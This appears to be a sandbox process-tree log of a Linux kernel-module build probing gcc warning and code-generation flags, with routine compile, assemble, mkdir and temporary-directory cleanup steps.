/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 "--param=allow-store-data-races=0" "-Wframe-larger-than=1024" -c -x c /dev/null -o /tmp/a/.tmp_1786/tmp4⤵PID:1788
-
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1786/tmp -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks --param "allow-store-data-races=0" -fstack-protector-strong -fstack-clash-protection -o /tmp/ccfoalFm.s5⤵PID:1789
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1786/tmp /tmp/ccfoalFm.s5⤵PID:1790
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1786/tmp /tmp/ccfoalFm.s5⤵PID:1790
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1786/tmp /tmp/ccfoalFm.s5⤵PID:1790
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1786/tmp /tmp/ccfoalFm.s5⤵PID:1790
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17864⤵PID:1791
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 --param=allow-store-data-races=0 -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wimplicit-fallthrough\"; else echo \"\"; fi"3⤵PID:1792
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17924⤵PID:1793
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 "--param=allow-store-data-races=0" "-Wframe-larger-than=1024" -fstack-protector-strong -Wimplicit-fallthrough -c -x c /dev/null -o /tmp/a/.tmp_1792/tmp4⤵
- Writes file to tmp directory
PID:1794 -
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1792/tmp -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=3" "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong --param "allow-store-data-races=0" -fstack-protector-strong -fstack-clash-protection -o /tmp/ccy4FCcR.s5⤵
- Writes file to tmp directory
PID:1795
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1792/tmp /tmp/ccy4FCcR.s5⤵PID:1796
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1792/tmp /tmp/ccy4FCcR.s5⤵PID:1796
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1792/tmp /tmp/ccy4FCcR.s5⤵PID:1796
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1792/tmp /tmp/ccy4FCcR.s5⤵
- Writes file to tmp directory
PID:1796
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17924⤵PID:1797
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 --param=allow-store-data-races=0 -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough -Wunused-but-set-variable -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-unused-but-set-variable\"; else echo \"\"; fi"3⤵PID:1798
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_17984⤵PID:1799
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 "--param=allow-store-data-races=0" "-Wframe-larger-than=1024" -fstack-protector-strong -Wimplicit-fallthrough -Wunused-but-set-variable -c -x c /dev/null -o /tmp/a/.tmp_1798/tmp4⤵PID:1800
-
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1798/tmp -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=3" -Wunused-but-set-variable "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong --param "allow-store-data-races=0" -fstack-protector-strong -fstack-clash-protection -o /tmp/cctM0ajl.s5⤵
- Writes file to tmp directory
PID:1801
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1798/tmp /tmp/cctM0ajl.s5⤵PID:1802
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1798/tmp /tmp/cctM0ajl.s5⤵PID:1802
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1798/tmp /tmp/cctM0ajl.s5⤵PID:1802
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1798/tmp /tmp/cctM0ajl.s5⤵PID:1802
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_17984⤵PID:1803
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 --param=allow-store-data-races=0 -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wunused-const-variable -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-unused-const-variable\"; else echo \"\"; fi"3⤵PID:1804
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_18044⤵PID:1805
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 "--param=allow-store-data-races=0" "-Wframe-larger-than=1024" -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wunused-const-variable -c -x c /dev/null -o /tmp/a/.tmp_1804/tmp4⤵PID:1806
-
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1804/tmp -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=3" -Wno-unused-but-set-variable "-Wunused-const-variable=2" "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong --param "allow-store-data-races=0" -fstack-protector-strong -fstack-clash-protection -o /tmp/ccO1HfdJ.s5⤵PID:1807
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1804/tmp /tmp/ccO1HfdJ.s5⤵PID:1808
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1804/tmp /tmp/ccO1HfdJ.s5⤵PID:1808
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1804/tmp /tmp/ccO1HfdJ.s5⤵PID:1808
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1804/tmp /tmp/ccO1HfdJ.s5⤵PID:1808
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_18044⤵PID:1809
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 --param=allow-store-data-races=0 -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -Wdangling-pointer -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \"-Wno-dangling-pointer\"; else echo \"\"; fi"3⤵PID:1810
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_18104⤵PID:1811
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 "--param=allow-store-data-races=0" "-Wframe-larger-than=1024" -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -Wdangling-pointer -c -x c /dev/null -o /tmp/a/.tmp_1810/tmp4⤵PID:1812
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_18104⤵PID:1813
-
-
-
/bin/sh/bin/sh -c "set -e; TMP=/tmp/a/.tmp_\$\$/tmp; TMPO=/tmp/a/.tmp_\$\$/tmp.o; mkdir -p /tmp/a/.tmp_\$\$; trap \"rm -rf /tmp/a/.tmp_\$\$\" EXIT; if ( gcc -Werror -D__KERNEL__ -Wall -Wundef -Werror=strict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE -Werror=implicit-function-declaration -Werror=implicit-int -Werror=return-type -Wno-format-security -std=gnu89 -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -fcf-protection=none -m64 -falign-jumps=1 -falign-loops=1 -mno-80387 -mno-fp-ret-in-387 -mpreferred-stack-boundary=3 -mskip-rax-setup -mtune=generic -mno-red-zone -mcmodel=kernel -DCONFIG_X86_X32_ABI -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -DCONFIG_AS_CFI_SECTIONS=1 -DCONFIG_AS_SSSE3=1 -DCONFIG_AS_AVX=1 -DCONFIG_AS_AVX2=1 -DCONFIG_AS_AVX512=1 -DCONFIG_AS_SHA1_NI=1 -DCONFIG_AS_SHA256_NI=1 -Wno-sign-compare -fno-asynchronous-unwind-tables -mindirect-branch=thunk-extern -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 --param=allow-store-data-races=0 -Wframe-larger-than=1024 -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -c -x c /dev/null -o \"\$TMP\") >/dev/null 2>&1; then echo \" -fno-var-tracking-assignments\"; else echo \"\"; fi"3⤵PID:1814
-
/usr/bin/mkdirmkdir -p /tmp/a/.tmp_18144⤵
- Reads runtime system information
PID:1815
-
-
/usr/bin/gccgcc -Werror -D__KERNEL__ -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security "-std=gnu89" -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx "-fcf-protection=none" -m64 "-falign-jumps=1" "-falign-loops=1" -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" -DCONFIG_X86_X32_ABI "-DCONFIG_AS_CFI=1" "-DCONFIG_AS_CFI_SIGNAL_FRAME=1" "-DCONFIG_AS_CFI_SECTIONS=1" "-DCONFIG_AS_SSSE3=1" "-DCONFIG_AS_AVX=1" "-DCONFIG_AS_AVX2=1" "-DCONFIG_AS_AVX512=1" "-DCONFIG_AS_SHA1_NI=1" "-DCONFIG_AS_SHA256_NI=1" -Wno-sign-compare -fno-asynchronous-unwind-tables "-mindirect-branch=thunk-extern" -mindirect-branch-register -fno-jump-tables -fno-delete-null-pointer-checks -Wno-frame-address -Wno-format-truncation -Wno-format-overflow -Wno-address-of-packed-member -O2 "--param=allow-store-data-races=0" "-Wframe-larger-than=1024" -fstack-protector-strong -Wimplicit-fallthrough -Wno-unused-but-set-variable -Wno-unused-const-variable -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments -c -x c /dev/null -o /tmp/a/.tmp_1814/tmp4⤵PID:1816
-
/usr/lib/gcc/x86_64-linux-gnu/9/cc1/usr/lib/gcc/x86_64-linux-gnu/9/cc1 -quiet -imultiarch x86_64-linux-gnu -D __KERNEL__ -D CONFIG_X86_X32_ABI -D "CONFIG_AS_CFI=1" -D "CONFIG_AS_CFI_SIGNAL_FRAME=1" -D "CONFIG_AS_CFI_SECTIONS=1" -D "CONFIG_AS_SSSE3=1" -D "CONFIG_AS_AVX=1" -D "CONFIG_AS_AVX2=1" -D "CONFIG_AS_AVX512=1" -D "CONFIG_AS_SHA1_NI=1" -D "CONFIG_AS_SHA256_NI=1" /dev/null -quiet -dumpbase null -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -mno-avx -m64 -mno-80387 -mno-fp-ret-in-387 "-mpreferred-stack-boundary=3" -mskip-rax-setup "-mtune=generic" -mno-red-zone "-mcmodel=kernel" "-mindirect-branch=thunk-extern" -mindirect-branch-register "-march=x86-64" -auxbase-strip /tmp/a/.tmp_1814/tmp -O2 -Werror -Wall -Wundef "-Werror=strict-prototypes" -Wno-trigraphs "-Werror=implicit-function-declaration" "-Werror=implicit-int" "-Werror=return-type" -Wno-format-security -Wno-sign-compare -Wno-frame-address "-Wformat-truncation=0" "-Wformat-overflow=0" -Wno-address-of-packed-member "-Wframe-larger-than=1024" "-Wimplicit-fallthrough=3" -Wno-unused-but-set-variable "-Wunused-const-variable=0" "-std=gnu90" -fno-strict-aliasing -fno-common -fshort-wchar -fno-PIE "-fcf-protection=none" "-falign-jumps=1" "-falign-loops=1" -fno-asynchronous-unwind-tables -fno-jump-tables -fno-delete-null-pointer-checks -fstack-protector-strong -fno-omit-frame-pointer -fno-optimize-sibling-calls -fno-var-tracking-assignments --param "allow-store-data-races=0" -fstack-protector-strong -fstack-clash-protection -o /tmp/ccXwV1av.s5⤵
- Writes file to tmp directory
PID:1817
-
-
/usr/local/sbin/asas --64 -o /tmp/a/.tmp_1814/tmp /tmp/ccXwV1av.s5⤵PID:1818
-
-
/usr/local/bin/asas --64 -o /tmp/a/.tmp_1814/tmp /tmp/ccXwV1av.s5⤵PID:1818
-
-
/usr/sbin/asas --64 -o /tmp/a/.tmp_1814/tmp /tmp/ccXwV1av.s5⤵PID:1818
-
-
/usr/bin/asas --64 -o /tmp/a/.tmp_1814/tmp /tmp/ccXwV1av.s5⤵PID:1818
-
-
-
/usr/bin/rmrm -rf /tmp/a/.tmp_18144⤵PID:1819
-
-
-
